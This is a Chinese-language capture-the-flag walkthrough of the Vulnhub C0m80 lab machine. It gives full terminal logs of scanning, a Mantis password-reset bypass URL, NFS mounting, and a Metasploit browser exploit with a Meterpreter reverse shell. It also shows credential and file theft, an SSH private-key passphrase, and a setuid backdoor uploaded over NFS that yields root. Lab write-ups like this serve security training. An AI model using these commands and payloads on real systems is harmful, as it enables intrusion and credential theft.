Vulnhub C0m80_3mrgnc3_v1.0
Vulnhub C0m80_3mrgnc3_v1.0
信息收集
# root @ kali in ~ [16:55:54]
$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.17.1 00:50:56:c0:00:08 VMware, Inc.
192.168.17.2 00:50:56:ee:36:e8 VMware, Inc.
192.168.17.140 00:0c:29:4e:9a:07 VMware, Inc.
192.168.17.254 00:50:56:e7:af:0c VMware, Inc.
7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.986 seconds (85.73 hosts/sec). 4 responded
# root @ kali in ~ [16:56:07]
$ nmap -sV -T4 -A -p- 192.168.17.140
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-20 16:56 CST
Nmap scan report for 192.168.17.140
Host is up (0.00072s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
|_http-title: BestestSoftware Ltd.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 41829/tcp mountd
| 100005 1,2,3 47224/udp mountd
| 100021 1,3,4 36722/udp nlockmgr
| 100021 1,3,4 40159/tcp nlockmgr
| 100024 1 46663/udp status
| 100024 1 58447/tcp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
20021/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, HTTPOptions, RPCCheck, RTSPRequest:
| 220 bestFTPserver 1.0.4 ready...
| ftp>
| Unknown ftp command
| ftp>
| GetRequest:
| 220 bestFTPserver 1.0.4 ready...
| ftp>
| (remote-file)
| usage: get remote-file [ local-file ]
| ftp>
| Help:
| 220 bestFTPserver 1.0.4 ready...
| ftp>
| Commands may be abbreviated.
| Commands are:
| mdelete qc site
| disconnect mdir sendport size
| account exit mget put status
| append form mkdir pwd struct
| ascii get mls quit system
| bell glob mode quote sunique
| binary hash modtime recv tenex
| help mput reget tick
| case idle newer rstatus trace
| image nmap rhelp type
| cdup ipany nlist rename user
| chmod ipv4 ntrans reset umask
| close ipv6 open restart verbose
| prompt rmdir ?
| delete ls passive desert
| debug macdef proxy send
| ftp>
| NULL:
| 220 bestFTPserver 1.0.4 ready...
|_ ftp>
40159/tcp open nlockmgr 1-4 (RPC #100021)
41829/tcp open mountd 1-3 (RPC #100005)
43670/tcp open mountd 1-3 (RPC #100005)
58447/tcp open status 1 (RPC #100024)
59256/tcp open mountd 1-3 (RPC #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port20021-TCP:V=7.70%I=7%D=9/20%Time=5BA360C6%P=x86_64-pc-linux-gnu%r(N
SF:ULL,28,"220\x20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>\0\0\0")%r(
SF:GenericLines,45,"220\x20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>\0
SF:\0\x00502\x20Unknown\x20ftp\x20command\nftp>\0")%r(GetRequest,64,"220\x
SF:20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>\0\0\0\(remote-file\)\x2
SF:0\nusage:\x20get\x20remote-file\x20\[\x20local-file\x20\]\nftp>\0\0\0")
SF:%r(HTTPOptions,45,"220\x20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>
SF:\0\0\x00502\x20Unknown\x20ftp\x20command\nftp>\0")%r(RTSPRequest,45,"22
SF:0\x20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>\0\0\x00502\x20Unknow
SF:n\x20ftp\x20command\nftp>\0")%r(RPCCheck,45,"220\x20bestFTPserver\x201\
SF:.0\.4\x20ready\.\.\.\nftp>\0\0\x00502\x20Unknown\x20ftp\x20command\nftp
SF:>\0")%r(DNSVersionBindReqTCP,45,"220\x20bestFTPserver\x201\.0\.4\x20rea
SF:dy\.\.\.\nftp>\0\0\x00502\x20Unknown\x20ftp\x20command\nftp>\0")%r(DNSS
SF:tatusRequestTCP,45,"220\x20bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp
SF:>\0\0\x00502\x20Unknown\x20ftp\x20command\nftp>\0")%r(Help,37A,"220\x20
SF:bestFTPserver\x201\.0\.4\x20ready\.\.\.\nftp>\0\0\0Commands\x20may\x20b
SF:e\x20abbreviated\.\nCommands\x20are:\n!\t\tdir\t\tmdelete\t\tqc\t\tsite
SF:\n\$\t\tdisconnect\tmdir\t\tsendport\tsize\naccount\t\texit\t\tmget\t\t
SF:put\t\tstatus\nappend\t\tform\t\tmkdir\t\tpwd\t\tstruct\nascii\t\tget\t
SF:\tmls\t\tquit\t\tsystem\nbell\t\tglob\t\tmode\t\tquote\t\tsunique\nbina
SF:ry\t\thash\t\tmodtime\t\trecv\t\ttenex\nbye\t\thelp\t\tmput\t\treget\t\
SF:ttick\ncase\t\tidle\t\tnewer\t\trstatus\t\ttrace\ncd\t\timage\t\tnmap\t
SF:\trhelp\t\ttype\ncdup\t\tipany\t\tnlist\t\trename\t\tuser\nchmod\t\tipv
SF:4\t\tntrans\t\treset\t\tumask\nclose\t\tipv6\t\topen\t\trestart\t\tverb
SF:ose\ncr\t\tlcd\t\tprompt\t\trmdir\t\t\?\ndelete\t\tls\t\tpassive\t\tdes
SF:ert\ndebug\t\tmacdef\t\tproxy\t\tsend\nftp>\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0");
MAC Address: 00:0C:29:4E:9A:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: C0M80; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: 0s
|_nbstat: NetBIOS name: C0M80, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: c0m80
| NetBIOS computer name: C0M80\x00
| Domain name: \x00
| FQDN: c0m80
|_ System time: 2018-09-20T09:59:05+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-09-20 16:59:05
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.17.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.16 seconds
# root @ kali in ~ [17:15:58] C:255
$ dirb http://192.168.17.140/ -N 403
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Sep 20 17:17:17 2018
URL_BASE: http://192.168.17.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Ignoring NOT_FOUND code -> 403
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.17.140/ ----
==> DIRECTORY: http://192.168.17.140/_vti_bin/
==> DIRECTORY: http://192.168.17.140/_vti_cnf/
==> DIRECTORY: http://192.168.17.140/_vti_log/
==> DIRECTORY: http://192.168.17.140/assets/
==> DIRECTORY: http://192.168.17.140/bin/
==> DIRECTORY: http://192.168.17.140/bugs/
==> DIRECTORY: http://192.168.17.140/dev/
+ http://192.168.17.140/favicon.ico (CODE:200|SIZE:15086)
==> DIRECTORY: http://192.168.17.140/images/
+ http://192.168.17.140/index.html (CODE:200|SIZE:8502)
---- Entering directory: http://192.168.17.140/_vti_bin/ ----
+ http://192.168.17.140/_vti_bin/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.17.140/_vti_cnf/ ----
+ http://192.168.17.140/_vti_cnf/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.17.140/_vti_log/ ----
+ http://192.168.17.140/_vti_log/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.17.140/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bin/ ----
+ http://192.168.17.140/bin/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.17.140/bugs/ ----
==> DIRECTORY: http://192.168.17.140/bugs/admin/
==> DIRECTORY: http://192.168.17.140/bugs/api/
==> DIRECTORY: http://192.168.17.140/bugs/config/
==> DIRECTORY: http://192.168.17.140/bugs/core/
==> DIRECTORY: http://192.168.17.140/bugs/css/
+ http://192.168.17.140/bugs/debug (CODE:200|SIZE:23296)
==> DIRECTORY: http://192.168.17.140/bugs/doc/
==> DIRECTORY: http://192.168.17.140/bugs/fonts/
==> DIRECTORY: http://192.168.17.140/bugs/images/
+ http://192.168.17.140/bugs/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.17.140/bugs/js/
==> DIRECTORY: http://192.168.17.140/bugs/lang/
==> DIRECTORY: http://192.168.17.140/bugs/library/
==> DIRECTORY: http://192.168.17.140/bugs/plugins/
==> DIRECTORY: http://192.168.17.140/bugs/scripts/
==> DIRECTORY: http://192.168.17.140/bugs/vendor/
---- Entering directory: http://192.168.17.140/dev/ ----
+ http://192.168.17.140/dev/index.php (CODE:200|SIZE:0)
+ http://192.168.17.140/dev/info.php (CODE:200|SIZE:62831)
---- Entering directory: http://192.168.17.140/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/admin/ ----
==> DIRECTORY: http://192.168.17.140/bugs/admin/check/
+ http://192.168.17.140/bugs/admin/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.17.140/bugs/api/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/library/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.17.140/bugs/admin/check/ ----
+ http://192.168.17.140/bugs/admin/check/index.php (CODE:200|SIZE:6772)
-----------------
END_TIME: Thu Sep 20 17:17:43 2018
DOWNLOADED: 41508 - FOUND: 12入侵后台
访问http://192.168.17.140看起来是一个静态页面
访问http://192.168.17.140/dev/info.php是一个phpinfo页面
访问http://192.168.17.140/bugs/login_page.php使用了Mantis
搜索Mantis的漏洞发现CVE-2017-7615
直接访问http://192.168.17.140/bugs/verify.php?id=1&confirm_hash= 可以绕过验证重置密码 但是有ip限制 不能登陆管理员账号
先重置guest账号的密码登陆 (guest账号的id')
在NotepadPussPuss++的修订历史中发现nfs 结合nmap的扫描结果 猜测需要访问nfs
连接nfs服务器 发现新文件
# root @ kali in ~ [23:09:20]
$ showmount -e 192.168.17.140
Export list for 192.168.17.140:
/ftpsvr/bkp *
# root @ kali in ~ [23:09:35]
$ mount -t nfs 192.168.17.140:/ftpsvr/bkp /mnt/
# root @ kali in ~ [23:09:39]
$ ls /mnt
ftp104.bkpftp104.bkp是一个纯文本文件 记录了一个exe文件的16进制
分析exe发现与之前扫描出来的20021端口内容有一定的重合 nc连上去确定20021端口跑的就是这个exe
连接上去只能ls cd、get、put等命令都无效 查看了几个其他命令发现提示
ftp>status
Connected to 127.0.0.1
No proxy connection.
Connecting using address family: any.
Mode: stream; Type: binary; Form: non-print; Structure: file
Backup path: C:\wwwroot\dev\ftp104.bkp
Verbose: on; Bell: off; Prompting: off; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: off
Tick counter printing: off
ftp>system
Bob was supposed to do this too!
He said there might be a BOUF in one of the commands to fix first?
Whatever that is? LOL
He spends too much time listening to his old cd's if you ask me!
Alice ;D提示说有一个命令存在BOUF 不知道是什么东西
RCE
ida分析了一下 发现发送url时 会被拼接到system里执行 从而导致命令执行 msf打一波
msf > use exploit/multi/browser/firefox_proto_crmfrequest
msf exploit(multi/browser/firefox_proto_crmfrequest) > set LHOST 192.168.17.139
LHOST => 192.168.17.139
msf exploit(multi/browser/firefox_proto_crmfrequest) > set target 1
target => 1
msf exploit(multi/browser/firefox_proto_crmfrequest) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/browser/firefox_proto_crmfrequest) > show options
Module options (exploit/multi/browser/firefox_proto_crmfrequest):
Name Current Setting Required Description
---- --------------- -------- -----------
ADDONNAME HTML5 Rendering Enhancements yes The addon name.
AutoUninstall true yes Automatically uninstall the addon after payload execution
CONTENT no Content to display inside the HTML <body>.
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.17.139 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Native Payload
msf exploit(multi/browser/firefox_proto_crmfrequest) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.17.139:4444
msf exploit(multi/browser/firefox_proto_crmfrequest) > [*] Using URL: http://0.0.0.0:8080/58ylkc3pg
[*] Local IP: http://192.168.17.139:8080/58ylkc3pg
[*] Server started.
[*] 192.168.17.140 firefox_proto_crmfrequest - Gathering target information for 192.168.17.140
[*] 192.168.17.140 firefox_proto_crmfrequest - Sending HTML response to 192.168.17.140
[*] 192.168.17.140 firefox_proto_crmfrequest - Sending HTML
[*] 192.168.17.140 firefox_proto_crmfrequest - Sending the malicious addon
[*] Sending stage (179779 bytes) to 192.168.17.140
[*] Meterpreter session 1 opened (192.168.17.139:4444 -> 192.168.17.140:37212) at 2018-09-21 09:31:57 +0800
msf exploit(multi/browser/firefox_proto_crmfrequest) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows C0m80\b0b @ C0m80 192.168.17.139:4444 -> 192.168.17.140:37212 (192.168.17.140)
msf exploit(multi/browser/firefox_proto_crmfrequest) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : C0m80
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_GB
Domain : C0m80
Logged On Users : 1
Meterpreter : x86/windows查看.ssh目录
meterpreter > ls
Listing: Z:\home\b0b\.ssh
=========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 181 fil 2017-09-23 11:32:09 +0800 .save~
100666/rw-rw-rw- 1766 fil 2017-09-23 04:05:59 +0800 id_rsa
100666/rw-rw-rw- 391 fil 2017-09-23 04:05:59 +0800 id_rsa.pub
100666/rw-rw-rw- 222 fil 2017-09-23 09:58:31 +0800 known_hosts
meterpreter > cat .save~
###### NO PASWORD HERE SRY ######
I'm using my new password manager
PWMangr2
just a note to say
WELL DONE & KEEP IT UP ;D
#################################
meterpreter > search -f *PWMangr2*
Found 1 result...
c:\users\b0b\Application Data\Mozilla\Extensions\PWMangr2.html (71471 bytes)
meterpreter > download 'c:\users\b0b\Application Data\Mozilla\Extensions\PWMangr2.html'
[*] Downloading: c:\users\b0b\Application Data\Mozilla\Extensions\PWMangr2.html -> PWMangr2.html
[*] Downloaded 69.80 KiB of 69.80 KiB (100.0%): c:\users\b0b\Application Data\Mozilla\Extensions\PWMangr2.html -> PWMangr2.html
[*] download : c:\users\b0b\Application Data\Mozilla\Extensions\PWMangr2.html -> PWMangr2.html打开PWMangr2.html 需要输入密码 根据提示猜测密码为alice 成功登陆 获得所有密码
ROOT SHELL
继续搜索上面ssh的信息 因为22端口没有开放 所以看一下ssh配置文件 发现只允许本地65122端口访问
meterpreter > cat sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 65122
# Use these options to restrict which interfaces/protocols sshd will bind to
ListenAddress ::1
#ListenAddress 127.0.0.1
......rdp没开 直接用b0b的密码登陆虚拟机 使用b0b的私钥去登陆al1ce账号
plink –l al1ce localhost –I id_rsa –P 65122用7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286解锁私钥
通过nfs上传后门 修改后门权限为4777
# root @ kali in ~/pentest [16:29:55]
$ nfspysh -o server=192.168.17.140:/ftpsvr/bkp
[email protected]:/ftpsvr/bkp:/> ls
/:
040770 0 34 4096 2017-09-23 09:37:01 .
100644 34 34 2757002 2018-09-21 16:29:01 ftp104.bkp
040770 0 34 4096 2017-09-23 09:37:01 ..
[email protected]:/ftpsvr/bkp:/> put ./shell
[email protected]:/ftpsvr/bkp:/> ls
/:
100644 0 34 207 2018-09-21 16:30:23 shell
040770 0 34 4096 2018-09-21 16:30:23 .
100644 34 34 2757002 2018-09-21 16:30:01 ftp104.bkp
040770 0 34 4096 2018-09-21 16:30:23 ..
[email protected]:/ftpsvr/bkp:/> chmod 4777 shellmsf监听
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.17.141:4444
[*] Sending stage (861480 bytes) to 192.168.17.140
[*] Meterpreter session 3 opened (192.168.17.141:4444 -> 192.168.17.140:37131) at 2018-09-21 16:32:18 +0800
meterpreter > shell
Process 6205 created.
Channel 1 created.
id
uid=1001(al1ce) gid=34(backup) euid=0(root) groups=0(root),34(backup)
whoami
root
cd /root
ls
flag.txt
cat flag.txt
############## WELL DONE ###############
You dealt BestestSoftware a killer C0m80
I really hope you enjoyed the challenge
and learned a thing of two while on your
journey here.
Please leave feelback & comments at:
https://3mrgnc3.ninja/
All the best.
3mrgnc3
;D
############ ROOT FLAG ##############
K1ll3rC0m80D3@l7&i5mash3dth1580x
######################################DONE